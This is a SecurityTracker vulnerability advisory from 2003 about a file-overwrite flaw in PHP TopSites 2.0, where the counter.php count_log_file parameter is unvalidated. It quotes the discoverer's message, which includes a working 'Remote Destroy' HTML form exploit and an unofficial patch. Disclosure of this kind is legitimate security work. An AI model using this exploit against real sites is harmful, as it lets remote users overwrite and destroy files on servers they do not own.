SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Generic)  >   PHP TopSites Vendors:   iTop10.Net
PHP Topsites 'counter.php' Input Validation Flaw Lets Remote Users Modify Files on the System
SecurityTracker Alert ID:  1006368
SecurityTracker URL:  http://securitytracker.com/id/1006368
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Mar 24 2003
Impact:   Denial of service via network, Modification of system information, Modification of user information
Exploit Included:  Yes  
Version(s): 2.0
Description:   Trent Pb reported a vulnerability in PHP Topsites. A remote user can modify some files on the server.

A remote user can reportedly specify an arbitrary file name for the 'count_log_file' variable to cause the counter.php script to overwrite the specified file with a series of numbers.

[Editor's note: The report does not indicate if a relative path or absolute path to another directory is permitted or not.]

A demonstration exploit web form is provided in the Source Message.

Skull Hacker is credited with discoving this flaw.

Impact:   A remote user can overwrite files on the target system that are writable by the web server process.
Solution:   No vendor solution was available at the time of this entry. The author of the report has provided an unofficial patch for the counter.php file, available in the Source Message.
Vendor URL:  www.itop10.net/products/ (Links to External Site)
Cause:   Access control error, Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  PHP TopSites 2.0 Remote Destroy Exploit


This is a multi-part message in MIME format.
--------------3542974A5DB0CAD12B39B9BF
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit


Hello i found this exploit in PHP Topsites 2.0 all the info is in the text 
file - Thanx !

_________________________________________________________________
http://ninemsn.com.au/mobilecentral/hotmail_messenger.asp

--------------3542974A5DB0CAD12B39B9BF
Content-Type: text/plain; charset=us-ascii;
 name="Topsites.txt"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
 filename="Topsites.txt"

---------------------------------------------------------------

PHP Topsites 2.0 Remote Destroy Exploit

Discovered By Skull Hacker 24/3/03

---------------------------------------------------------------

Greetz, I found a vulnrebility in counter.php on PHP Topsites 2.0 a remote 
attacker can open and replace a file off thier choice on the server with 
lines of numbers. I have included a patch and exploit as seen below.

Exploit:

Simply change the URL too the Vulnrible TopSite URL save, run and click 
destroy !

<HTML>

<HEAD>
<TITLE>PHP Topsites 2.0 Remote Destroy Exploit. Found By Skull 
Hacker</TITLE>
</HEAD>

<BODY>

<P><B><FONT FACE="Arial">PHP
Topsites 2.0 Remote Destroy Exploit
- Discovered By Skull Hacker
<FONT SIZE="1">
<A HREF="mailto:skull_hacker@hackersof2000.net">
skull_hacker@hackersof2000.net</A>
.<BR>
<BR>
</FONT><FONT SIZE="2">Click
destroy and the Topsites will then be
fully erased and replaced with
numbers. Enjoy ! note: Change the count_log_file=index.php too any file u 
want too overwrite on the server.<BR>
</FONT></FONT></B></P>
<FORM METHOD="POST" 
ACTION="http://www.sitetoohack.com/counter.php?count_log_file=index.php">

<INPUT TYPE="submit" VALUE="Destroy" NAME="B1"></P>
</FORM>

</BODY>

</HTML>

Patch:

Open counter.php and replace all of it with this and remember too change the 
log file in this patch.

<?

$count_log_file = "--Your Log File--"; // Patch For TopSites 2.0 counter.php 
Remote Destroy Exploit By Skull Hacker.

$counter_file_line = file($count_log_file);
$counter_file_line[0] = $counter_file_line[0]+1;

$cf = fopen($count_log_file, "w");
flock($cf,2);
fputs($cf, "$counter_file_line[0]");
fclose($cf);

$display = $counter_file_line[0];

if ($counter_file_line[0] >= 10000000) {
	$display = round(($counter_file_line[0]/1000000))."M";
}

elseif ($counter_file_line[0] >= 100000) {
	$display = round(($counter_file_line[0]/1000))."K";
}

echo $display;

?>




--------------3542974A5DB0CAD12B39B9BF--



 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC